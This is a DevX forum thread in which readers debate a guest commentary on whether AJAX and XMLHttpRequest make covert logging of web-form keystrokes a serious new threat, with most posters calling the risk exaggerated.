dcsimg


DevX Home    Today's Headlines   Articles Archive   Tip Bank   Forums   

Results 1 to 12 of 12

Thread: Using the XMLHttpRequest Object and AJAX to Spy On You

  1. #1

    Using the XMLHttpRequest Object and AJAX to Spy On You

    This week's guest commentary, by Earle Castledine, discusses the not-so-obvious security risks of asynchronous processing from Web forms using AJAX. Give it a read and let us know whether this use of Ajax worries you.

    http://www.devx.com/webdev/Article/28861

    Lori Piquet
    DevX

  2. #2
    Join Date
    Aug 2005
    Location
    Louisville, KY
    Posts
    1

    XMLHttpRequest is no different than a hidden iframe

    As the author fleetingly stated, the same asynchronous communication with the server has been available for years with JavaScript and a hidden iframe (an iframe with "display: none;" style). I really don't see how using XMLHttpRequest allows someone to be more devious than sending the user's keystrokes and other actions to the server in a hidden iframe.

    --Dan

  3. #3
    Join Date
    Aug 2005
    Posts
    1

    This is a beat-up

    And I presume the author proposes that .NET thick client software is the solution!!

    The risks outlined by the author are totally exaggerated. I mean to say, what is the risk that I am here, typing away to create a message thread in a public forum, and suddenly I forget where I am and I start typing my Internet Banking User Name and Password. If I do that, I've got a lot more to worry about than XMLHttpRequest.

    And of course, what the author doesn't mention is that standard applications written in .NET or a zillion other languages are potentially far more harmful than anything XMLHttpRequest can do. Spyware anyone!

    This is an absolute beat-up.

  4. #4
    Join Date
    Aug 2005
    Posts
    1

    I can do this already.

    This was already a threat before AJAX was a word and remote calls were reasonably easy to work with, and people seem to have dealt with it just fine. Blaming a more user friendly interface for potential key logging threats seems like a disconnected concept to me.

    Any knowledgeable web developer can do this now if they wanted to. AJAX isn't going to make honest devs into crooks.

  5. #5
    Join Date
    Sep 2005
    Posts
    1

    using eval will not hide evil javascript

    The article suggests a line such as eval( xmlReq.responseText ); would be able to hide evil javascript from a user. True it won't appear in the source code but the responce will certainly be cached locally allowing it to be viewed.

  6. #6
    Join Date
    Sep 2005
    Posts
    1

    Eh...

    I can see this being an issue if you could log keystrokes bound for another site, in a different window, etc. But as the author describes it, I'm not impressed. The notion that companies are going to log textarea entries looking for brainfarts is, frankly, a bit ridiculous. Can you imagine the expense that would go into trying to mine this information for anything useful?

    Phishers might get some use out of it -- the first time I was ever hit by a phishing attack I think I may have actually typed the first couple numbers of my credit card before thinking, wait a minute. But it's hard to see this as a really serious threat.

    Moreover, the technology already exists. What's the suggestion here? That developers will stop using it for valid purposes because a few individuals are trying to get away with something nefarious? Kinda like how people stopped making guns after a few murders occurred?

    Sorry, you're going to have to do better to scare me.

  7. #7
    Join Date
    Sep 2005
    Posts
    1
    I think many posters are missing the point here. It's not that it wasn't possible before to do this before AJAX became a buzzword. The reason it becomes a big threat is because, no doubt, AJAX apps will soon become wide-spread and no doubt cut & paste scripts will be (even more than they are now) readily available with nice online tutorials and "AJAX in 21 days" will be at Amazon. (If criminals had to learn the mechanics of how to use gunpowder to accelerate a projectile, instead of just buying/stealing a gun...)

    It's the whole "Security by Obscurity" concept. Think of how many more security exploits fell upon Firefox after it gained significant market share.

    And, the very problem IS the amount of Phishers out there looking for a better way to make their sites look and act more authentic. No, MS is not going to steal your CC number.

    There is nothing inherently wrong with AJAX (I think it ROCKS!), the author is just trying to make the point that it allows malicious scripts/exploits/phishes to become a lot less obvious. Mark my word, you WILL hear about many AJAX-based exploits in the next year.

    Before getting emotional about hearing bad news that your latest toy is being taken off the shelf because children are choking on it, UNDERSTAND that the author is NOT calling for a stop to using AJAX. He's just trying to give savvy users the heads up to watch out for exploits.

    However, it's not going to stop me from using AJAX.

  8. #8
    Join Date
    Nov 2005
    Posts
    1
    I've started looking into doing this for my wife's company (she's a recruiter) as a small, real-time programming test. They've been complaining about having hired several programmers recently that looked good on paper and resume, but once they got the job it became clear their skills were NOT what they represented.

    The programming manager and other programmers are interested in having a real-time programming test along the lines of "Fix this code" while being able to watch the progress of the applicant during the phone screening. If someone is unable to find and fix a few simple errors in a snippet of code, then it's probably not worth bringing them in for interviews and wasting everybody's time.

    So there's definitely some valid real world applications for using the technology like this, provided it's made clear to the other user that what they do is being monitored.

  9. #9
    Join Date
    Jan 2006
    Posts
    1

    If It's a Fad, Fight It with Fearmongering!

    I have seen a number of posts on blogs across the Internet that laid AJAX to waste as a fad, a worthless trend, and an inappropriately-named non-language that should be more appropriately called "Asynchronous JavaScript and XML" without ever shortening it, because real men only use real acronyms for real technologies.

    It all entertains me, but then again, so does AJAX itself. I find it wickedly exciting to do what I can to adapt to the changing capabilities of online applications, and while AJAX's key idea may not be new, its newfound popularity at least made me aware that the technique was not only possible but that it was the driving force behind some new sites that I had long since fallen in love with.

    If I had to briefly describe the idea of AJAX as a whole, I would dedicate maybe a sentence to what occupies three section headers in this article. The sentence would read, "While there are potential security hazards associated with possible confusion to the end-user and the ability to load without notification, these hazards are rarely practical or logical in their execution, and the beneficial uses of AJAX by benevolent webmasters far outweighs this pre-existing danger." That's just how it is.

    The bottom line is that paranoia as a whole (a feeling this article promotes to its closing question, "Scared yet?") has never overwhelmed the browsing public so severely that they gave up completely harmless and highly beneficial services for the sake of personal security. When suspicious folks started looking through WHOIS records, they made domain registration optionally private. When some angry people attacked the people and ideas of the western world via aircraft, it took a few weeks for us to start buying our plane tickets again. When the banks started noticing a growing trend of identity theft, they began teaching lessons on how to prevent it, not simply suggesting people should just cower in fear. Now, when JavaScript-savvy people begin to find these web sites (corporate or otherwise in nature), the public will fight back (just as they always have) and toss the site to the media hounds, thus informing a huge portion of the online world and alerting us all not to make the mistake of trusting that site.

    There is simply no reason why AJAX will meet its death at the hands of fearmongering. Online banking has yet to meet its death despite the countless phishing sites that litter the web, and eCommerce is so thriving that its effect on the global economy remains outstanding.

    If people allow themselves to at all distrust their fellow friendly web developer because they use a technique that someone somewhere exploited, or if they stop exercising the freedom granted by the Internet to access and send information because of pure fear, they have surrendered their psychological authority to the same malicious people who sought to harm them in the first place.

    Besides, what corporation would have either the nerve or the corporate logic to implement the suggested Apple activity? I can name all too many times when I left the keyboard shortly, when someone else was typing my request and wanted to be humorous, or when I simply mistyped my thoughts into a form. What human is capable of discerning those innocent situations from the one listed? It would be a matter of pure assumption, something the contract-centered corporations of today know better than to do with their customers.

    Besides, e-mail isn't affected by AJAX anyway. I say this not just to be a nerd who corrects your idea (I know you meant a web form), but to say that your overgeneralization makes a good point. E-mail will be the likely solution people implement if they really do get paranoid of AJAX. AJAX wouldn't dare reach their pretyped text because e-mail, in all its old-fashioned goodness, is still the kind of system that, for the most part, websites can't ever reach out of their own window and grab other applications that don't authorize it.

    Nevertheless, as I sit here developing one of my first online applications with good old AJAX, I can't help but feel excited that there will soon come a day (if it's not here already) when enough literature, online and in print, will exist that a large number of web sites will start adopting this efficient idea and others like it (Flex, etc.), rendering the web a smoother and more continuous place. Who knows, it might also have the side effect of boosting popularity for CSS-supported layouts, making the web as a whole look even better.

  10. #10
    Join Date
    Feb 2006
    Posts
    1

    Question how to disable XMLHttpRequest?

    The author asked "Not ready to rise up and strip the XMLHttpRequest code from your browser?"

    Is there a way to do this, if I wanted to?

  11. #11
    Join Date
    Jul 2006
    Posts
    1
    Quote Originally Posted by SlvrEagle23
    ...

    If I had to briefly describe the idea of AJAX as a whole, I would dedicate maybe a sentence to what occupies three section headers in this article. The sentence would read, "While there are potential security hazards associated with possible confusion to the end-user and the ability to load without notification, these hazards are rarely practical or logical in their execution, and the beneficial uses of AJAX by benevolent webmasters far outweighs this pre-existing danger." That's just how it is.

    The bottom line is that paranoia as a whole (a feeling this article promotes to its closing question, "Scared yet?") has never overwhelmed the browsing public so severely that they gave up completely harmless and highly beneficial services for the sake of personal security. When suspicious folks started looking through WHOIS records, they made domain registration optionally private. When some angry people attacked the people and ideas of the western world via aircraft, it took a few weeks for us to start buying our plane tickets again. When the banks started noticing a growing trend of identity theft, they began teaching lessons on how to prevent it, not simply suggesting people should just cower in fear. Now, when JavaScript-savvy people begin to find these web sites (corporate or otherwise in nature), the public will fight back (just as they always have) and toss the site to the media hounds, thus informing a huge portion of the online world and alerting us all not to make the mistake of trusting that site.

    There is simply no reason why AJAX will meet its death at the hands of fearmongering. Online banking has yet to meet its death despite the countless phishing sites that litter the web, and eCommerce is so thriving that its effect on the global economy remains outstanding.

    ...

    Besides, what corporation would have either the nerve or the corporate logic to implement the suggested Apple activity? I can name all too many times when I left the keyboard shortly, when someone else was typing my request and wanted to be humorous, or when I simply mistyped my thoughts into a form. What human is capable of discerning those innocent situations from the one listed? It would be a matter of pure assumption, something the contract-centered corporations of today know better than to do with their customers.
    This is exactly right. I second this.

    Best, Brad

  12. #12
    Join Date
    Mar 2008
    Posts
    1

    The Author is Ignorant

    He really things all of a sudden communication is hidden because of XMLHttpRequests... or even Iframes? Companies have been spying on shopping patterns for thousands of years. It has gotten more sophisticated though. Companies today can use cameras and facial recognition software to automatically gain your "UserID" and track your shopping paterns if they wanted.

    If you are really such a paranoid person when it comes to the internet... then just get a Network Analyzer, like Commview. That is the only way to know what is leaving your computer... and it goes for Web pages, windows apps, spyware, whatever you are afraid of. You can even setup alerts to go off for whatever scenario you imagine. Technical advances happen on both fronts.

    There is nothing that will stop internet applications from evolving. The internet today is still stone-age... like playing Pacman on an Atari verses playing Halo online with your buddies. People aren't going to give up their Xbox because they are afraid Microsoft has the capability to figure out how long it takes for you to choose a movie for rent.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
HTML5 Development Center
 
 
FAQ
Latest Articles
Java
.NET
XML
Database
Enterprise
Questions? Contact us.
C++
Web Development
Wireless
Latest Tips
Open Source


   Development Centers

   -- Android Development Center
   -- Cloud Development Project Center
   -- HTML5 Development Center
   -- Windows Mobile Development Center